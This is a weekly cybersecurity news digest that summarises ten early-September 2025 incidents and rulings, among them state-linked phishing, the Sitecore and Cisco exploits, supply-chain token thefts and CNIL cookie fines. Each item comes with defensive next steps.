08 sept.
The anti-hero of the week is a classic Word marco that was used to spear phish 50 embassies, ministries and international organisations. We also have the French threatening Google with a 100 000€/ day fine if they don’t fix their cookie business.
And haven’t done this in a while but at the very end I also included a “long form” article. If you’re in information security, I think it’s a good article to share as part of your regular awareness training. Simple, relatable stories around phishing.
P.S. If you like you can get this news summary to your inbox every Monday. Scroll down to subscribe.
1. Iran’s MOIS-Linked ‘Homeland Justice’ APT Phishes 50+ Diplomatic Missions Worldwide
In August, Iran’s Ministry of Intelligence–aligned Homeland Justice APT used 104 compromised email accounts to spear-phish more than 50 embassies, ministries and international organizations across six continents. The attackers sent macro-embedded Word documents from legitimate addresses—routed through a NordVPN exit node—to deploy an infostealer with simple evasion techniques.
Key Details
- Emails originated from hijacked official accounts (e.g., Oman MFA in Paris like @fm.gov.com) via a Jordan VPN exit node.
- Targets included ~50 embassies, consulates, ministries, UN agencies, African Union, World Bank and NGOs.
- Malicious VBA macros used “vbHide” and multi-loop “laylay” delays; final payload “sysProcUpdate” harvested system metadata.
- Campaign ran only days in August; researchers report the attackers’ C2 infrastructure now appears offline.
Next Steps
- Block or sandbox macro-enabled documents from external senders.
- Search logs for connections to known C2 domains (e.g., screenai.online) and unusual outbound VPN traffic.
Read more at Dark Reading
2. CISA Orders Patch for Actively Exploited Sitecore Zero-Day
The Cybersecurity and Infrastructure Security Agency has mandated all federal civilian agencies to remediate a critical deserialization flaw in Sitecore products by September 25, 2025. Attackers exploited a publicly documented ASP.NET machine key to perform ViewState deserialization, gain RCE, deploy reconnaissance malware, and escalate privileges in compromised environments.
Key Details
- The flaw (CVE-2025-53690, CVSS 9.0) hinges on default machine keys included in Sitecore guides published before 2017.
- Mandiant disrupted an in-the-wild attack where exposed keys enabled a ViewState payload (.NET assembly “WEEPSTEEL”) for system reconnaissance.
Next Steps
- Apply Sitecore security bulletin KB1003865 before Sept. 25.
- Rotate and encrypt all ASP.NET
machineKeyvalues inweb.configfiles. - Monitor logs for anomalous
__VIEWSTATEPOST requests.
Read more at Sitecore Support, CISA, Mandiant
3. Salesloft Drift Supply-Chain Breach Exposes Customer Data at Cloudflare, Zscaler and Palo Alto Networks
A threat actor tracked as UNC6395 exploited stolen OAuth tokens from the Salesloft Drift chatbot integration to access and exfiltrate data from Salesforce instances at hundreds of organizations, including Cloudflare, Zscaler and Palo Alto Networks. Stolen data—ranging from business contact details to support-ticket contents and potentially embedded secrets—has prompted all three firms to disable the Drift integration, rotate credentials and notify affected customers.
Key Details
- Attack window: August 8–18, 2025; reconnaissance began August 9.
- Cloudflare found 104 API tokens in support-ticket text fields; none showed misuse but were rotated.
- Zscaler and Palo Alto Networks confirmed exposure of customer names, emails, phone numbers, case metadata and some commercial licensing details.
- No core services or infrastructure at the breached vendors were compromised—only their Salesforce CRM data was accessed via the third-party integration.
Next Steps
- Disconnect Salesloft Drift integrations immediately.
- Rotate OAuth tokens, API keys and any shared credentials.
- Review Salesforce login history and bulk-API audit logs for unusual activity.
- Strengthen third-party SaaS governance and enforce token expiration policies.
Read more at The Record, Cloudflare Blog, Zscaler Blog, Palo Alto Networks Blog
4. Jaguar Land Rover Production and Retail Halted by Cyber Incident
Jaguar Land Rover proactively shut down global IT systems to contain a cyberattack, leading to multi-day stoppages in car production at Halewood and retail operations. No customer data appears compromised.
Key Details
- Halewood plant staff told not to work from Monday through Wednesday.
- Production at Solihull and dealer systems also affected.
- No evidence of customer data exfiltration; incident type undisclosed.
- JLR revenue ~£29 billion; automotive downtime can cost ~£1.6 million per hour.
Read more at The Record, Bleeping Computer, Cybersecurity News
5. Cloudflare Mitigates Record 11.5 Tbps UDP Flood DDoS Attack
Cloudflare’s automated defenses stopped a hyper-volumetric UDP flood that peaked at 11.5 Tbps and 5.1 billion packets per second in a 35-second burst, preventing any customer-facing disruption. The record attack—sourced from a mix of compromised IoT devices and multiple cloud providers.
Key Details
- Largest of hundreds of hyper-volumetric attacks blocked by Cloudflare in recent weeks.
- Attack mixed IoT-based botnets with traffic from several public cloud platforms.
- Volumetric DDoS account for about 75% of all DDoS attack types.
Read more at Dark Reading
6. GhostRedirector Uses Malicious IIS Module for SEO Fraud on 65 Windows Servers
A China-aligned group dubbed GhostRedirector has infected at least 65 Windows servers since August 2024 with two custom tools—Rungan, a C++ backdoor, and Gamshen, a malicious IIS module—to manipulate Google search rankings for gambling sites without affecting normal visitors. By serving altered responses only to Googlebot, attackers create artificial backlinks that can damage the compromised sites’ SEO reputation. Security teams should immediately review IIS modules, tighten administrative access, and monitor for unusual crawler responses.
Key Details
- Victims span healthcare, retail, transportation, education, and tech in Brazil, Thailand, Vietnam, the US, Peru, Canada, and Europe.
- Initial entry likely via SQL injection, followed by PowerShell downloads from “868id[.]com.”
- Rungan backdoor supports remote commands; Gamshen injects SEO payloads only when detecting Googlebot.
- Attackers used EfsPotato and BadPotato exploits to create persistent administrator accounts.
Next Steps
- Audit all IIS modules; remove or re-sign unauthorized extensions.
- Enforce MFA and least-privilege for IIS and database accounts.
Read more at ESET, The Record
7. US Offers $10M Reward for Info on FSB Hackers Exploiting Cisco Flaw
The U.S. Department of State is offering up to $10 million for information on three FSB officers accused of exploiting CVE-2018-0171 in end-of-life Cisco Smart Install devices to breach U.S. critical infrastructure and more than 500 foreign energy firms. These state-sponsored actors have installed backdoors and conducted industrial control systems reconnaissance across government and energy networks.
Key Details
- Reward targets Marat Tyukov, Mikhail Gavrilov, and Pavel Akulov of FSB’s Center 16 (aka Berserk Bear, Blue Kraken).
- Victims include the U.S. Nuclear Regulatory Commission and Wolf Creek Nuclear Operating Corp.
Read more at BleepingComputer
8. CNIL Fines Google €325M and Shein €150M for Cookie Consent Violations. Warns 100 000€/Day If Not Fixed
France’s data protection regulator (CNIL) has slapped Google with a €325 million fine and fast-fashion retailer Shein with €150 million for deploying advertising cookies and in - Gmail ads without valid user consent, breaching the French Data Protection Act and the Postal and Electronic Communications Code. Both firms must comply with revised consent flows within six months or face up to €100,000 daily penalties.
Key Details
- Google pushed default targeted-ad cookies during account setup and injected ads into Gmail “Promotions” and “Social” tabs without clear opt-outs.
- CNIL found over 74 million affected Google accounts and ruled that consent was neither informed nor freely given.
- Shein’s cookie banners lacked complete information and gave users inadequate refusal options; the retailer has since updated its platform but will appeal.
- CNIL warns of €100,000/day fines if systems aren’t aligned with French cookie-consent rules by March 2026.
Next Steps
- Audit all cookies and their cookie-consent banners for clarity and granular opt-in controls
- Validate compliance
Read more at The Hacker News
9. GhostAction Supply Chain Attack Steals Over 3,300 Secrets from Hundreds of GitHub Repositories
On September 2–5, attackers inserted malicious GitHub Actions workflows into 817 repositories to harvest 3,325 CI/CD secrets — including npm, PyPI, DockerHub tokens and AWS credentials — and exfiltrate them to an external server. GitGuardian discovered the “GhostAction” campaign, alerted 573 maintainers, and prompted platforms to lock affected projects and monitor for unauthorized package releases and cloud access.
Key Details
- Attackers personalized each commit by matching existing secret names in Python, JavaScript, Rust and Go repos.
- Exfiltration server pointed to IP 45.139.104.115 under the “plesk.page” domain until September 5.
- No malicious package releases confirmed yet, but 9 npm and 15 PyPI projects still have compromised tokens.
- Some stolen credentials were already used to probe AWS environments and database services.
Next Steps
- Scan workflows for unexpected “Github Actions Security” commits.
- Rotate and revoke all exposed CI/CD tokens immediately.
- Monitor npm, PyPI and cloud accounts for unauthorized publishes or logins.
Read more at Hackread.com
10: Long form Recommendation: Examples of High-stakes Phising Campaigns
It's a good article with very specific examples that anyone non-techy can relate to about phising, fishing. It's a good one to share as part of regular security awareness trainings.
Read more at CSO Online: You should be aware of these latest social engineering trends
Subscribe
Subscribe to receive weekly cybersecurity news summary to your inbox every Monday.
Estonian 
English